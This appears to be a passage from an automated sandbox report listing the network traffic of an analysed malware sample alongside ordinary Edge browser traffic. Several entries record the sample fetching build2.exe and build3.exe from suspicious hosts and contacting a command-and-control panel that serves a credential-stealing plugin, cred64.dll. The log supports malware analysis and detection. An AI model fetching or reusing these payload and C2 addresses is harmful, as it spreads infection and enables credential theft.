22%3Anull%7D%7DHTTP Response
200 -
20.82.250.189:443https://smartscreen-prod.microsoft.com/windows/browser/edge/data/bloomfilter/x?pushCert=false&flight=%7B%22ETag%22%3A%22%5C%22f1N%2BZtS%2B4zEcF5jUnfkfY83au2YpaEz3mRg50jHrtzo%3D%5C%22%22%2C%22Ids%22%3A%5B%22P-R-1021007-4-5%2CP-R-99770-9-32%2CP-R-86682-4-37%2CP-R-73000-7-30%2CP-R-72999-7-29%2CP-R-70204-3-18%2CP-R-69385-1-5%2CP-R-68026-3-37%2CP-R-68490-1-3%2CP-R-68172-2-4%2CP-R-68175-1-6%2CP-R-68176-2-8%2CP-R-68179-1-3%2CP-R-68306-1-20%2CP-R-68307-1-3%2CP-D-68194-1-2%22%5D%2C%22Settings%22%3A%7B%22Names%22%3Anull%2C%22Ring%22%3A0%2C%22Models%22%3Anull%2C%22ServiceClientModelDetonate%22%3Afalse%2C%22WdsiFeedback%22%3Afalse%2C%22NPFeedbackUriOverride%22%3Anull%2C%22NetworkFilterDetonate%22%3Afalse%2C%22ServicePhishDetonate%22%3Afalse%2C%22ServicePhishDetonateLegacy%22%3Afalse%2C%22ServiceAdhocDetonate%22%3Afalse%2C%22NpSettings2004%22%3Atrue%2C%22UpdateSigningCert%22%3Atrue%2C%22UpdateSigningCertForRS3RS4%22%3Atrue%2C%22NpSettings2004Value%22%3A0%2C%22IsCOCOBlockEnabled%22%3Afalse%2C%22NpIpBlockOverrideValue%22%3A0%2C%22TopTrafficV2Enabled%22%3Atrue%2C%22ListApiE5V2Enabled%22%3Atrue%2C%22IsNpPIOverrideBlockEnabled%22%3Atrue%2C%22TopTrafficV2MobileFlightEnabled%22%3Afalse%2C%22BloomFilterDeltaFlag%22%3A1%2C%22SrcEOPEnabled%22%3Atrue%2C%22IsCurfId0LoggingEnabled%22%3Atrue%2C%22IsCurfId0BlockingEnabled%22%3Afalse%2C%22UpdateOnMissingEtagEnabled%22%3Atrue%2C%22EnableProxyLeniency%22%3Atrue%2C%22IsArsFmsIntegrationEnabled%22%3Atrue%2C%22EnableNsHumorMatch%22%3Atrue%2C%22ApplyNsHumorVerdict%22%3Afalse%2C%22EnableNpSkipNonWeb%22%3Afalse%2C%22SendGeoMapInSettingsToNewAnaheimClient%22%3Atrue%2C%22UmsSrcPhishBNRTEnabled%22%3Afalse%2C%22MTDThrottleFactor%22%3A0.0%2C%22UnsilenceModelGuid%22%3Anull%7D%7D&os=10.0.19041.1288.vb_releasetls, httpmsedge.exe3.0kB 12.1kB 13 14
HTTP Request
GET https://smartscreen-prod.microsoft.com/windows/browser/edge/data/bloomfilter/x?pushCert=false&flight=%7B%22ETag%22%3A%22%5C%22f1N%2BZtS%2B4zEcF5jUnfkfY83au2YpaEz3mRg50jHrtzo%3D%5C%22%22%2C%22Ids%22%3A%5B%22P-R-1021007-4-5%2CP-R-99770-9-32%2CP-R-86682-4-37%2CP-R-73000-7-30%2CP-R-72999-7-29%2CP-R-70204-3-18%2CP-R-69385-1-5%2CP-R-68026-3-37%2CP-R-68490-1-3%2CP-R-68172-2-4%2CP-R-68175-1-6%2CP-R-68176-2-8%2CP-R-68179-1-3%2CP-R-68306-1-20%2CP-R-68307-1-3%2CP-D-68194-1-2%22%5D%2C%22Settings%22%3A%7B%22Names%22%3Anull%2C%22Ring%22%3A0%2C%22Models%22%3Anull%2C%22ServiceClientModelDetonate%22%3Afalse%2C%22WdsiFeedback%22%3Afalse%2C%22NPFeedbackUriOverride%22%3Anull%2C%22NetworkFilterDetonate%22%3Afalse%2C%22ServicePhishDetonate%22%3Afalse%2C%22ServicePhishDetonateLegacy%22%3Afalse%2C%22ServiceAdhocDetonate%22%3Afalse%2C%22NpSettings2004%22%3Atrue%2C%22UpdateSigningCert%22%3Atrue%2C%22UpdateSigningCertForRS3RS4%22%3Atrue%2C%22NpSettings2004Value%22%3A0%2C%22IsCOCOBlockEnabled%22%3Afalse%2C%22NpIpBlockOverrideValue%22%3A0%2C%22TopTrafficV2Enabled%22%3Atrue%2C%22ListApiE5V2Enabled%22%3Atrue%2C%22IsNpPIOverrideBlockEnabled%22%3Atrue%2C%22TopTrafficV2MobileFlightEnabled%22%3Afalse%2C%22BloomFilterDeltaFlag%22%3A1%2C%22SrcEOPEnabled%22%3Atrue%2C%22IsCurfId0LoggingEnabled%22%3Atrue%2C%22IsCurfId0BlockingEnabled%22%3Afalse%2C%22UpdateOnMissingEtagEnabled%22%3Atrue%2C%22EnableProxyLeniency%22%3Atrue%2C%22IsArsFmsIntegrationEnabled%22%3Atrue%2C%22EnableNsHumorMatch%22%3Atrue%2C%22ApplyNsHumorVerdict%22%3Afalse%2C%22EnableNpSkipNonWeb%22%3Afalse%2C%22SendGeoMapInSettingsToNewAnaheimClient%22%3Atrue%2C%22UmsSrcPhishBNRTEnabled%22%3Afalse%2C%22MTDThrottleFactor%22%3A0.0%2C%22UnsilenceModelGuid%22%3Anull%7D%7D&os=10.0.19041.1288.vb_releaseHTTP Response
200 -
20.82.250.189:443https://smartscreen-prod.microsoft.com/api/browser/edge/data/settingstls, httpmsedge.exe4.9kB 141.4kB 59 106
HTTP Request
POST https://smartscreen-prod.microsoft.com/api/browser/edge/data/settingsHTTP Response
200 -
25.5kB 831.2kB 448 691
-
20.86.249.62:443https://nav.smartscreen.microsoft.com/api/browser/edge/actionstls, httpmsedge.exe2.7kB 12.2kB 14 14
HTTP Request
POST https://nav.smartscreen.microsoft.com/api/browser/edge/actionsHTTP Response
200 -
104.73.152.149:443https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.pngtls, http2msedge.exe31.0kB 914.7kB 444 716
HTTP Request
GET https://learn.microsoft.com/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Response
301HTTP Request
GET https://learn.microsoft.com/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Request
GET https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Response
301HTTP Response
200HTTP Request
GET https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Response
304HTTP Request
GET https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/aeed2be4.site-ltr.cssHTTP Response
200HTTP Request
GET https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/global/67a45209.deprecation.jsHTTP Request
GET https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/scripts/4b524b8e.index-docs.jsHTTP Response
200HTTP Response
200HTTP Request
GET https://learn.microsoft.com/static/third-party/MathJax/2.7.2/MathJax.js?config=TeX-AMS_CHTMLHTTP Response
200HTTP Request
GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.pngHTTP Response
200HTTP Request
GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.pngHTTP Response
200HTTP Request
GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.pngHTTP Response
200HTTP Request
GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.pngHTTP Response
200HTTP Request
GET https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?HTTP Request
GET https://learn.microsoft.com/en-us/dotnet/framework/toc.jsonHTTP Request
GET https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.jsonHTTP Request
GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.pngHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://learn.microsoft.com/static/third-party/MathJax/2.7.2/config/TeX-AMS_CHTML.js?V=2.7.2HTTP Response
200HTTP Request
GET https://learn.microsoft.com/en-us/banners/index.jsonHTTP Response
200HTTP Request
GET https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/docons.9a89adae.woff2HTTP Response
200HTTP Request
GET https://learn.microsoft.com/favicon.icoHTTP Response
200HTTP Request
GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.pngHTTP Response
304HTTP Request
GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.pngHTTP Response
304HTTP Request
GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.pngHTTP Request
GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.pngHTTP Response
304HTTP Response
304HTTP Request
GET https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?HTTP Request
GET https://learn.microsoft.com/en-us/dotnet/framework/toc.jsonHTTP Response
304HTTP Request
GET https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.jsonHTTP Response
304HTTP Response
304HTTP Request
GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.pngHTTP Response
304HTTP Request
GET https://learn.microsoft.com/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Response
301HTTP Request
GET https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Response
304HTTP Request
GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.pngHTTP Response
304HTTP Request
GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.pngHTTP Request
GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.pngHTTP Response
304HTTP Response
304HTTP Request
GET https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?HTTP Request
GET https://learn.microsoft.com/en-us/dotnet/framework/toc.jsonHTTP Request
GET https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.jsonHTTP Request
GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.pngHTTP Request
GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.pngHTTP Response
304HTTP Response
304HTTP Response
304HTTP Response
304HTTP Response
304HTTP Request
GET https://learn.microsoft.com/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Response
301HTTP Request
GET https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Response
304HTTP Request
GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.pngHTTP Response
304HTTP Request
GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.pngHTTP Response
304HTTP Request
GET https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?HTTP Request
GET https://learn.microsoft.com/en-us/dotnet/framework/toc.jsonHTTP Request
GET https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.jsonHTTP Request
GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.pngHTTP Request
GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.pngHTTP Request
GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.pngHTTP Response
304HTTP Response
304HTTP Response
304HTTP Response
304HTTP Response
304HTTP Response
304 -
20.86.249.62:443https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2tls, httpmsedge.exe5.6kB 9.4kB 15 14
HTTP Request
POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2HTTP Response
200 -
20.86.249.62:443https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2tls, httpmsedge.exe3.6kB 9.3kB 13 12
HTTP Request
POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2HTTP Response
200 -
20.86.249.62:443https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2tls, httpmsedge.exe5.6kB 9.4kB 15 14
HTTP Request
POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2HTTP Response
200 -
1.1kB 8.2kB 15 12
HTTP Request
GET https://api.2ip.ua/geo.jsonHTTP Response
429 -
7.8kB 73.1kB 71 71
-
3.7kB 91.3kB 55 78
-
211.119.84.112:80http://ex3mall.com/lancer/get.php?pid=D399FB9CECE73F192FF02F88D7A801FA&first=truehttpB9CF.exe416 B 979 B 6 5
HTTP Request
GET http://ex3mall.com/lancer/get.php?pid=D399FB9CECE73F192FF02F88D7A801FA&first=trueHTTP Response
200 -
16.1kB 430.2kB 317 316
HTTP Request
GET http://uaery.top/dl/build2.exeHTTP Response
200 -
2.7kB 8.2kB 13 18
HTTP Request
OPTIONS https://mdec.nelreports.net/api/report?cat=mdocsHTTP Response
200HTTP Request
POST https://mdec.nelreports.net/api/report?cat=mdocsHTTP Response
200 -
8.8.4.4:443https://dns.google/dns-query?dns=AAABAAABAAAAAAABBWxlYXJuCW1pY3Jvc29mdANjb20AAAEAAQAAKRAAAAAAAABQAAwATAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtls, http2msedge.exe2.0kB 8.5kB 19 22
HTTP Request
GET https://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHTTP Request
GET https://dns.google/dns-query?dns=AAABAAABAAAAAAABBWxlYXJuCW1pY3Jvc29mdANjb20AAAEAAQAAKRAAAAAAAABQAAwATAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -
8.8.4.4:443https://dns.google/dns-query?dns=AAABAAABAAAAAAABBGVkZ2UJbWljcm9zb2Z0A2NvbQAAAQABAAApEAAAAAAAAFEADABNAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtls, http2msedge.exe2.0kB 8.5kB 19 22
HTTP Request
GET https://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHTTP Request
GET https://dns.google/dns-query?dns=AAABAAABAAAAAAABBGVkZ2UJbWljcm9zb2Z0A2NvbQAAAQABAAApEAAAAAAAAFEADABNAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -
104.73.152.149:443https://learn.microsoft.com/api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batchtls, http2msedge.exe3.1kB 15.9kB 27 34
HTTP Request
POST https://learn.microsoft.com/api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batchHTTP Response
200HTTP Request
POST https://learn.microsoft.com/api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batchHTTP Response
200HTTP Request
POST https://learn.microsoft.com/api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batchHTTP Response
200HTTP Request
POST https://learn.microsoft.com/api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batchHTTP Response
200 -
322 B 7
-
2.2kB 7.8kB 17 21
-
648 B 10.5kB 12 11
HTTP Request
GET http://ex3mall.com/files/1/build3.exeHTTP Response
200 -
2.7kB 8.0kB 11 10
-
1.1kB 6.7kB 9 9
-
19.7kB 10.0kB 27 19
-
74.3kB 7.5kB 77 42
-
75.2kB 7.8kB 78 42
-
4.9kB 133.5kB 101 99
HTTP Request
POST http://62.204.41.91/8kcnjd3da3/index.phpHTTP Response
200HTTP Request
GET http://62.204.41.91/8kcnjd3da3/Plugins/cred64.dllHTTP Response
200 -
88.221.24.115:443https://assets.msn.com/weathermapdata/1/static/weatherEplant/bubble/32x32.pngtls, http2msedge.exe17.5kB 583.2kB 269 453
HTTP Request
GET https://assets.msn.com/staticsb/statics/latest/oneTrust/1.5/scripttemplates/otSDKStub.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/staticsb/statics/latest/oneTrust/1.5/scripttemplates/6.25.0/otBannerSdk.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/staticsb/statics/latest/oneTrust/1.5/scripttemplates/6.25.0/otTCF.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/statics/icons/favicon_newtabpage.pngHTTP Response
200HTTP Request
GET https://assets.msn.com/service/news/feed/pages/ntp?User=m-0B196D17FEC56BBC00017F9CFFCD6AE0&activityId=BBDF58A6-1710-44BE-A527-DB44C4CAFD8D&apikey=0QfOX3Vn51YCzitbLaRkTTBadtWpgTN8NZLW0C1SEM&audienceMode=adult&caller=bgtask&cm=nl-nl&contentType=article,video,slideshow,webcontent&duotone=true&infopaneCount=17&memory=4&newsSkip=0&newsTop=48&ocid=anaheim-ntp-feeds&prerender=1&timeOut=2000HTTP Response
200HTTP Request
GET https://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_20_6_202212302356.svgHTTP Request
GET https://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_20_6_202212310020.svgHTTP Request
GET https://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_20_6_202212310044.svgHTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_20_6_202212310108.svgHTTP Request
GET https://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_20_6_202212310132.svgHTTP Request
GET https://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_20_6_202212302356.svgHTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_20_6_202212310020.svgHTTP Request
GET https://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_20_6_202212310044.svgHTTP Request
GET https://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_20_6_202212310108.svgHTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_20_6_202212310132.svgHTTP Response
200HTTP Request
GET https://assets.msn.com/weathermapdata/1/static/svg/72/v6/card/LightRainV3.svgHTTP Response
200HTTP Request
GET https://assets.msn.com/weathermapdata/1/static/weather/Icons/taskbar//Alert_WI_Y.svgHTTP Response
200HTTP Request
GET https://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_21_6_202212302356.svgHTTP Response
200HTTP Request
GET https://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_21_6_202212302356.svgHTTP Response
200HTTP Request
GET https://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_21_6_202212310020.svgHTTP Response
200HTTP Request
GET https://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_21_6_202212310020.svgHTTP Response
200HTTP Request
GET https://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_21_6_202212310044.svgHTTP Request
GET https://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_21_6_202212310044.svgHTTP Response
200HTTP Response
200HTTP Request
GET https://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_21_6_202212310108.svgHTTP Request
GET https://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_21_6_202212310108.svgHTTP Response
200HTTP Request
GET https://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_21_6_202212310132.svgHTTP Response
200HTTP Response
200HTTP Request
GET https://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_21_6_202212310132.svgHTTP Response
200HTTP Request
GET https://assets.msn.com/weathermapdata/1/static/background/v2.0/jpg/rain_2.jpgHTTP Response
200HTTP Request
GET https://assets.msn.com/weathermapdata/1/static/background/v2.0/jpg/sunny.jpgHTTP Response
200HTTP Request
GET https://assets.msn.com/service/News/Users/me/Rewards?apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=BBDF58A6-1710-44BE-A527-DB44C4CAFD8D&ocid=anaheim-ntp-Peregrine&cm=nl-nl&user=m-0B196D17FEC56BBC00017F9CFFCD6AE0&scn=APP_ANON&version=2HTTP Response
200HTTP Request
GET https://assets.msn.com/weathermapdata/1/static/weatherEplant/animation/greeting_once_cv2.gifHTTP Response
200HTTP Request
GET https://assets.msn.com/weathermapdata/1/static/weatherEplant/bubble/32x32.pngHTTP Response
200 -
88.221.24.115:443https://assets.msn.com/bundles/v1/edgeChromium/latest/xfeed.58ab99bbfec1b22f4593.jstls, http2msedge.exe174.0kB 7.2MB 3113 5530
HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.2f86014fe9543279282f.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/microsoft.a2002d1d0671497c684f.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/staticsb/statics/latest/oneTrust/1.5/consent/55a804ab-e5c6-4b97-9319-86263d365d28/55a804ab-e5c6-4b97-9319-86263d365d28.jsonHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/common.e4f56449506648e57a1d.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/experience.eaf138ecbe33568d515f.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/staticsb/statics/latest/oneTrust/1.5/consent/55a804ab-e5c6-4b97-9319-86263d365d28/3f919e77-021f-4b8a-a023-eb702b275e96/nl-nl.jsonHTTP Response
200HTTP Request
GET https://assets.msn.com/staticsb/statics/latest/oneTrust/1.5/consent/55a804ab-e5c6-4b97-9319-86263d365d28/iab2Data.jsonHTTP Response
200HTTP Request
GET https://assets.msn.com/staticsb/statics/latest/oneTrust/1.5/scripttemplates/6.25.0/assets/otFlat.jsonHTTP Request
GET https://assets.msn.com/staticsb/statics/latest/oneTrust/1.5/scripttemplates/6.25.0/assets/v2/otPcCenter.jsonHTTP Request
GET https://assets.msn.com/staticsb/statics/latest/oneTrust/1.5/scripttemplates/6.25.0/assets/otCookieSettingsButton.jsonHTTP Request
GET https://assets.msn.com/staticsb/statics/latest/oneTrust/1.5/scripttemplates/6.25.0/assets/otCommonStyles.cssHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/topicData.2f87b36d845c192a4005.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/feed-navigation-header.49f8d5a22223ee379222.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_MsftInfopaneModule_js.676830c5bc3aeeae5acd.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedModule_js.d29bbb665e79fef8f507.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/grid-view-feed.94a4e2b7b899f9486726.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/service/News/Users/Me/Actions?apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=BBDF58A6-1710-44BE-A527-DB44C4CAFD8D&ocid=anaheim-ntp-feeds&cm=nl-nl&user=m-0B196D17FEC56BBC00017F9CFFCD6AE0&targetType=provider&actionType=Subscribe&$top=100HTTP Request
GET https://assets.msn.com/service/msn/topics?apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=BBDF58A6-1710-44BE-A527-DB44C4CAFD8D&ocid=anaheim-ntp-feeds&cm=nl-nl&user=m-0B196D17FEC56BBC00017F9CFFCD6AE0&queryType=MyFeed&$top=1000&allTopics=true&responseSchema=cardview&location=52.3056|4.9421HTTP Response
200HTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_finance-service-library_dist_redux_FinanceData_connector_js.94b5b78bc9c3aac238cb.jsHTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_feed-layout_dist_card-templates_CardTemplateMap_js-libs_feed-layout_dist_layout-template-04f62b.2291ca07fdb408108a16.jsHTTP Response
200HTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/feedDependencies.c692c31f68575ac9b9e1.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/node_modules_sortablejs_modular_sortable_esm_js.883fee7723671fc5aa12.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/trendingNowWC.2edfd643a25b797aa650.jsHTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/weather-data-connector.2f7e678ccd0d91b8e789.jsHTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/experiences_weather-card-wc_dist_index_js.6fde389715706b86a515.jsHTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_shopping-utils_dist_Urls_ShoppingHomepageUrlGenerator_js-web-components_horizontal-card--c55bdd.6c78604dbed3dd7b6768.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_icons-wc_icons_CardActionFluentButton_svg-libs_icons-wc_icons_HideV2_svg-web-components_-82846b.83584aababb78ad3b4f8.jsHTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/shopping-card-wce.39c3f0a59393767fa462.jsHTTP Response
200HTTP Response
200HTTP Request
GET https://assets.msn.com/content/v1/cms/api/amp/Document/BBGgoUgHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/articleFre.e3bf405503e652d34746.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/content/v1/cms/api/amp/Document/BBOTMVtHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/articleRelatedStories.2499321aeb09db944d31.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/content/v1/cms/api/amp/Document/BB1dwxz2HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/experiences_weather-card-wc_dist_components_weather-hide-dialog_index_js.a9e732aa68c48635c6b0.jsHTTP Response
200HTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/articleTopComment.261f195982c3f9f2e127.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/autos-carousel.20db49212ef4a484aa56.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/autosMarketplaceCard.9e0f6ffb58fb7ea93841.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/back-to-top-button.a93dfb875b4ed8c59d67.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/background-gallery.f3d05771e6458ddeb71b.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/bingHealthCard.e2a5e9af18da5031e9ab.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/brand-zone.4e4118ac89e3b1da2a8f.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/coachmark-wc.4bc2414da4b6a606950b.jsHTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/conditionalBannerWC.429af708b05046bc75d2.jsHTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/breakingNewsWC.54f5d43f325cb7327a1f.jsHTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/bundler.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/card-actions-wc.0891284392e37fc6341d.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/common-settings-edgenext.20a402af8361779e1044.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/super-coach-mark-wc.1c396a99762216926e6a.jsHTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/waffle-wc.89786a4b76ef7635d7e7.jsHTTP Response
200HTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/welcomeGreeting.fe44f7ae95a0f9395254.jsHTTP Response
